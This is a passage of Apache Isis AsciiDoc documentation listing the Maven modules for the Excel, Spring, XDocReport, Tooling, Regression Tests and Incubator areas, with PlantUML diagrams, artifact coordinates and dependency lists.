xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalContiguous.adoc[WithIntervalContiguous], xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalMutable.adoc[WithIntervalMutable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameComparable.adoc[WithNameComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameGetter.adoc[WithNameGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameUnique.adoc[WithNameUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceComparable.adoc[WithReferenceComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceGetter.adoc[WithReferenceGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceUnique.adoc[WithReferenceUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithSequence.adoc[WithSequence], xref:refguide:subdomains:index\/base\/applib\/with\/WithStartDate.adoc[WithStartDate], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleComparable.adoc[WithTitleComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleGetter.adoc[WithTitleGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleUnique.adoc[WithTitleUnique]\n****\n|===\n\n=== Excel\n\n[plantuml,Excel,svg]\n----\n@startuml(id=Excel)\ntitle Excel - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Excel\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Excel (Fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Excel (Integ Tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Excel (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Excel (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Sub - Excel (testing support)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n}\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 6 : \"\"\n@enduml\n----\n.Projects\/Modules (Excel)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Excel (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel\nType: pom\nDirectory: \/subdomains\/excel\n----\n|A domain service for Apache Isis', allowing collections\nof (view model) objects to be exported\/imported to\/from an\nExcel spreadsheet. Also support for excel-based fixtures.\n\n|Apache Isis Sub - Excel (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-applib\nType: jar\nDirectory: \/subdomains\/excel\/applib\n----\n|.Components\n****\no.a.i.subdomains.excel.applib.dom.ExcelService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/applib\/IsisModuleSubdomainsExcelApplib.adoc[IsisModuleSubdomainsExcelApplib], xref:refguide:subdomains:index\/excel\/applib\/dom\/AggregationType.adoc[AggregationType], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelMetaDataEnabled.adoc[ExcelMetaDataEnabled], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelService.adoc[ExcelService], xref:refguide:subdomains:index\/excel\/applib\/dom\/HyperLink.adoc[HyperLink], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotColumn.adoc[PivotColumn], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotDecoration.adoc[PivotDecoration], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotRow.adoc[PivotRow], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotValue.adoc[PivotValue], xref:refguide:subdomains:index\/excel\/applib\/dom\/RowHandler.adoc[RowHandler], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetContent.adoc[WorksheetContent], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetSpec.adoc[WorksheetSpec], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationList.adoc[AnnotationList], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationTriplet.adoc[AnnotationTriplet], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelFileBlobConverter.adoc[ExcelFileBlobConverter], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelServiceImpl.adoc[ExcelServiceImpl], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/Mode.adoc[Mode], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/PivotUtils.adoc[PivotUtils], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/SheetPivoter.adoc[SheetPivoter]\n****\n\n|Apache Isis Sub - Excel (Fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-fixtures\nType: jar\nDirectory: \/subdomains\/excel\/fixture\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-testing:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (Integ Tests)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-integtests\nType: jar\nDirectory: \/subdomains\/excel\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-fixtures:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (testing support)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-testing\nType: jar\nDirectory: \/subdomains\/excel\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/testing\/ExcelFixture.adoc[ExcelFixture], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixture2.adoc[ExcelFixture2], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureRowHandler.adoc[ExcelFixtureRowHandler], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureWorkbookHandler.adoc[ExcelFixtureWorkbookHandler], xref:refguide:subdomains:index\/excel\/testing\/FixtureAwareRowHandler.adoc[FixtureAwareRowHandler], xref:refguide:subdomains:index\/excel\/testing\/IsisModuleSubdomainsExcelTesting.adoc[IsisModuleSubdomainsExcelTesting]\n****\n|===\n\n=== Spring\n\n[plantuml,Spring,svg]\n----\n@startuml(id=Spring)\ntitle Spring - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Spring\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Spring (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Spring (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Spring)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Spring (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring\nType: pom\nDirectory: \/subdomains\/spring\n----\n|Utility services for interacting with the Spring application context (that hosts the Apache Isis application itself)\n\n|Apache Isis Sub - Spring (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring-applib\nType: jar\nDirectory: \/subdomains\/spring\/applib\n----\n|.Components\n****\no.a.i.subdomains.spring.applib.service.SpringBeansService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/spring\/applib\/IsisModuleSubdomainsSpringApplib.adoc[IsisModuleSubdomainsSpringApplib], xref:refguide:subdomains:index\/spring\/applib\/service\/BeanDescriptor.adoc[BeanDescriptor], xref:refguide:subdomains:index\/spring\/applib\/service\/ContextBeans.adoc[ContextBeans], xref:refguide:subdomains:index\/spring\/applib\/service\/SpringBeansService.adoc[SpringBeansService]\n****\n|===\n\n=== XDocReport\n\n[plantuml,XDocReport,svg]\n----\n@startuml(id=XDocReport)\ntitle XDocReport - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"XDocReport\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - XdocReport (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - XdocReport (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (XDocReport)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - XdocReport (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport\nType: pom\nDirectory: \/subdomains\/xdocreport\n----\n|Integrates XDoc Report Library\n\n|Apache Isis Sub - XdocReport (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport-applib\nType: jar\nDirectory: \/subdomains\/xdocreport\/applib\n----\n|.Components\n****\no.a.i.subdomains.xdocreport.applib.service.XDocReportService +\n****\n\n.Dependencies\n****\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.converter.docx.xwpf:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.document.docx:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.template.freemarker:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.core:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.pdf:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/xdocreport\/applib\/IsisModuleSubdomainsXDocReportApplib.adoc[IsisModuleSubdomainsXDocReportApplib], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/OutputType.adoc[OutputType], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportModel.adoc[XDocReportModel], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportService.adoc[XDocReportService]\n****\n|===\n\n== Tooling\n\n[plantuml,Tooling,svg]\n----\n@startuml(id=Tooling)\ntitle Tooling - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Tooling\\n[Software System]\" {\n rectangle \"==Apache Isis - Tooling\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Tooling - C4 Modeling\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis - Tooling - CLI (Command Line Interface)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis - Tooling - Java Model (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis - Tooling - Java to Asciidoc (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis - Tooling - Model for AsciiDoc\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis - Tooling - Project Model (Code mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Tooling)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Tooling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling\nType: pom\nDirectory: \/tooling\n----\n|Libraries and tools not depending on the _Apache Isis Core_ ecosystem,\neg. code mining, automated documentation.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\ncom.google.code.findbugs:annotations:jar:3.0.1u2 +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mapstruct:mapstruct-processor:jar:1.4.2.Final +\norg.projectlombok:lombok:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\n****\n\n|Apache Isis - Tooling - C4 Modeling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-c4modeling\nType: jar\nDirectory: \/tooling\/c4modeling\n----\n|Library for programmatic C4 Model generation.\n\nSee https:\/\/c4model.com\/\n\n.Dependencies\n****\ncom.structurizr:structurizr-core:jar:<managed> +\ncom.structurizr:structurizr-plantuml:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - CLI (Command Line Interface)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-cli\nType: jar\nDirectory: \/tooling\/cli\n----\n|Command Line Interface for the _Apache Isis Tooling_ ecosystem.\n\n.Dependencies\n****\ninfo.picocli:picocli:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-c4modeling:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-java2adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-projectmodel:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java to Asciidoc (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-java2adoc\nType: jar\nDirectory: \/tooling\/java2adoc\n----\n|Code mining library for Java source to Asciidoc conversion.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java Model (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-javamodel\nType: jar\nDirectory: \/tooling\/javamodel\n----\n|Code mining library for Java bytecode introspection.\n\n.Dependencies\n****\ncom.github.andi-huber:code-assert:jar:-SNAPSHOT +\ncom.github.javaparser:javaparser-core:jar:${javaparser.version} +\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Model for AsciiDoc\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-model4adoc\nType: jar\nDirectory: \/tooling\/model4adoc\n----\n|Library for programmatic AsciiDoc generation.\n\nThe AsciiDoc name is trademarked by the Eclipse Foundation (https:\/\/www.eclipse.org\/).\nThis project is *not* part of the specification effort for _AsciiDoc_ under the\nAsciiDoc Working Group. See https:\/\/projects.eclipse.org\/proposals\/asciidoc-language\nand https:\/\/accounts.eclipse.org\/mailing-list\/asciidoc-wg. However, we are happy to\nhelp with transfer of source code, if any project (under the umbrella of the\nAsciiDoc Working Group) is willing to take over.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Project Model (Code mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-projectmodel\nType: jar\nDirectory: \/tooling\/projectmodel\n----\n|Code mining library for Gradle\/Maven project module tree introspection.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.maven:maven-model-builder:jar:<managed> +\norg.gradle:gradle-tooling-api:jar:<managed> +\n****\n|===\n\n== Regression Tests\n\n[plantuml,Regression Tests,svg]\n----\n@startuml(id=Regression_Tests)\ntitle Regression Tests - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Regression Tests\\n[Software System]\" {\n rectangle \"==Apache Isis - Regression Tests\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Regression Tests (stable)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Regression Tests)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Regression Tests\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests\nType: pom\nDirectory: \/regressiontests\n----\n|Collection of JUnit tests covering core functionalities of the framework.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\norg.apache.directory.server:apacheds-test-framework:jar:2.0.0.AM26 +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-shiro-realm-ldap-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-restclient-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jpa:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:${project.version} +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.glassfish:javax.json:jar:1.1.4 +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis - Regression Tests (stable)\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests-stable\nType: jar\nDirectory: \/regressiontests\/stable\n----\n|.Components\n****\no.a.i.testdomain.applayer.ApplicationLayerTestFactory +\no.a.i.testdomain.applayer.ApplicationLayerTestFactory$PreCommitListener +\no.a.i.testdomain.applayer.publishing.CommandSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityChangesSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityPropertyChangeSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.ExecutionSubscriberForTesting +\no.a.i.testdomain.conf.Configuration_headless$HeadlessCommandSupport +\no.a.i.testdomain.jdo.JdoInventoryDao +\no.a.i.testdomain.jpa.JpaInventoryDao +\no.a.i.testdomain.jpa.springdata.EmployeeRepository +\no.a.i.testdomain.util.interaction.InteractionBoundaryProbe +\no.a.i.testdomain.util.kv.KVStoreForTesting +\no.a.i.testdomain.util.rest.RestEndpointService +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\n****\n|===\n\n== Incubator\n\n[plantuml,Incubator,svg]\n----\n@startuml(id=Incubator)\ntitle Incubator - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Incubator\\n[Software System]\" {\n rectangle \"==Apache Isis Incubator\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Incubator)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Incubator\n[source,yaml]\n----\nGroup: org.apache.isis.incubator\nArtifact: isis-incubator\nType: pom\nDirectory: \/incubator\n----\n|Collection of Apache Isis extensions, subdomains or BC mappings, currently incubating.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== Kroviz Client\n\n[plantuml,Kroviz Client,svg]\n----\n@startuml(id=Kroviz_Client)\ntitle Kroviz Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Kroviz Client\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Client kroViz\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Kroviz Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Client kroViz\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.clients\nArtifact: isis-client-kroviz\nType: jar\nDirectory: \/incubator\/clients\/kroviz\n----\n|Initial sketches\n|===\n\n=== JavaFX Viewer\n\n[plantuml,JavaFX Viewer,svg]\n----\n@startuml(id=JavaFX_Viewer)\ntitle JavaFX Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JavaFX Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer JavaFX\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer JavaFX (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (JavaFX Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer JavaFX\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx\nType: pom\nDirectory: \/incubator\/viewers\/javafx\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer JavaFX (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-model\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.openjfx:javafx-base:jar:<managed> +\norg.openjfx:javafx-controls:jar:<managed> +\norg.openjfx:javafx-fxml:jar:<managed> +\norg.openjfx:javafx-swing:jar:<managed> +\norg.openjfx:javafx-web:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-ui\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.javafx.ui.components.UiComponentFactoryFx +\no.a.i.incubator.viewer.javafx.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.number.NumberFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.objectref.ObjectReferenceFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForLabeled +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForMenuItem +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconServiceDefault +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingInfoPopupProvider +\no.a.i.incubator.viewer.javafx.ui.main.MainViewFx +\no.a.i.incubator.viewer.javafx.ui.main.UiActionHandlerFx 